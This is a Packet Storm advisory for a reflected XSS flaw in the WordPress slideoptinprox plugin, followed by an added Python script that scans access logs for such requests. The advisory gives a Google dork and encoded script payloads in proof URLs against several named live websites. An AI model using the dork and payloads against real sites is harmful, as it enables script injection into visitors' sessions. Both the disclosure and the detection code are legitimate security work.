WordPress Slideoptinprox Cross Site Scripting

2015-01-09T00:00:00
ID PACKETSTORM:129873
Type packetstorm
Reporter 4L1R3Z4
Modified 2015-01-09T00:00:00

Description

                                        
`|#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#|  
|-------------------------------------------------------------------------|  
|[*] Exploit Title: WordPress slideoptinprox Plugin Cross-Site Scripting Vulnerability  
|  
|[*] Google Dork: inurl:"/wp-content/plugins/slideoptinprox/"  
|  
|[*] Date: 2015-01-08  
|  
|[*] Exploit Author: Ashiyane Digital Security Team  
|  
|[*] Vendor Homepage: https://pluginu.com/slideoptinprox/  
|  
|[*] Tested on: Windows 8.1, Kali Linux  
|  
|-------------------------------------------------------------------------|  
|  
|[*] Location :  
[localhost]/wp-content/plugins/slideoptinprox/inc/ar_submit.php?id=2&n=[XSS]  
|  
|-------------------------------------------------------------------------|  
|[*] Proof:  
|  
|[*]  
http://www.fishingfanatic.us/wp-content/plugins/slideoptinprox/inc/ar_submit.php?id=2&n=%22/%3E%3Cscript%3Ealert%281%29;%3C/script%3E  
|  
|[*]  
http://www.beziehung-retten24.com//wp-content/plugins/slideoptinprox/inc/ar_submit.php?id=2&n=%22/%3E%3Cscript%3Ealert%281%29;%3C/script%3E  
|  
|[*]  
http://voiceacting.com/blog//wp-content/plugins/slideoptinprox/inc/ar_submit.php?id=2&n=%22/%3E%3Cscript%3Ealert%281%29;%3C/script%3E  
|  
|[*]  
http://drdebranixon.com/wp-content/plugins/slideoptinprox/app/view.php?id=2%22/%3E%3Cscript%3Ealert%281%29;%3C/script%3E  
|  
|[*]  
http://pinguin-werkstatt.com//wp-content/plugins/slideoptinprox/inc/ar_submit.php?id=2&n=%22/%3E%3Cscript%3Ealert%281%29;%3C/script%3E  
|  
|-------------------------------------------------------------------------|  
|[*] Discovered By : 4L1R3Z4 |  
|-------------------------------------------------------------------------|  
|#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#|  
`
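
A defender-side check for the requests this advisory describes, as an added example that is not part of the original advisory: it scans web server access logs for requests to the two plugin endpoints listed above whose reflected parameter (`n` for `ar_submit.php`, `id` for `view.php`) decodes to HTML markup characters. The combined log format, the sample log lines and the function name are assumptions.

```python
import re
from urllib.parse import parse_qs

# Endpoint suffix -> reflected parameter, both taken from the advisory above.
WATCHED = {
    "/wp-content/plugins/slideoptinprox/inc/ar_submit.php": "n",
    "/wp-content/plugins/slideoptinprox/app/view.php": "id",
}
# Characters that let a value close an HTML attribute or open a tag.
MARKUP = re.compile(r"[<>\"']")
# Request field of a combined-format access log line (assumed log format).
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')


def suspicious_requests(lines):
    """Return (client_ip, path, param, decoded_value) for each flagged line."""
    hits = []
    for line in lines:
        m = REQUEST.search(line)
        if not m:
            continue
        # Split by hand: urlsplit() would read a target starting with '//'
        # as a host name and drop the first path segment.
        raw_path, _, query = m.group(1).partition("?")
        path = re.sub(r"/{2,}", "/", raw_path)  # collapse duplicate slashes
        for suffix, param in WATCHED.items():
            if not path.endswith(suffix):
                continue
            # parse_qs percent-decodes each value before the markup check.
            for value in parse_qs(query, keep_blank_values=True).get(param, []):
                if MARKUP.search(value):
                    hits.append((line.split()[0], path, param, value))
    return hits


# Constructed sample log lines (documentation IP ranges, not real traffic).
SAMPLE_LOG = [
    '203.0.113.7 - - [09/Jan/2015:10:01:02 +0000] "GET //wp-content/plugins/slideoptinprox/inc/ar_submit.php?id=2&n=%22/%3E%3Cscript%3Ealert%281%29;%3C/script%3E HTTP/1.1" 200 512',
    '198.51.100.4 - - [09/Jan/2015:10:02:10 +0000] "GET /wp-content/plugins/slideoptinprox/inc/ar_submit.php?id=2&n=Alice HTTP/1.1" 200 498',
    '203.0.113.9 - - [09/Jan/2015:10:03:44 +0000] "GET /blog//wp-content/plugins/slideoptinprox/app/view.php?id=2%22/%3E%3Cscript%3Ealert%281%29;%3C/script%3E HTTP/1.1" 200 530',
    '198.51.100.4 - - [09/Jan/2015:10:04:01 +0000] "GET /index.php?s=%3Cb%3E HTTP/1.1" 200 100',
]

if __name__ == "__main__":
    for hit in suspicious_requests(SAMPLE_LOG):
        print(hit)
```

Matching on the path suffix keeps the check working for installs under a subdirectory such as `/blog/`, as in one of the URLs above.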